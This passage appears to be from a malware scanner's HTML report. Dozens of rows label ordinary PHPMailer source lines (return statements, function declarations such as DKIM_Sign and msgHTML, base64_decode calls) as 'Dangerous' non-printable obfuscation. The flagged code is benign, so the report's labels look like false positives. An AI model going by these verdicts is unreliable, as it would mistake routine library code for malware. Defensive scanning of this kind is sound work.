</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
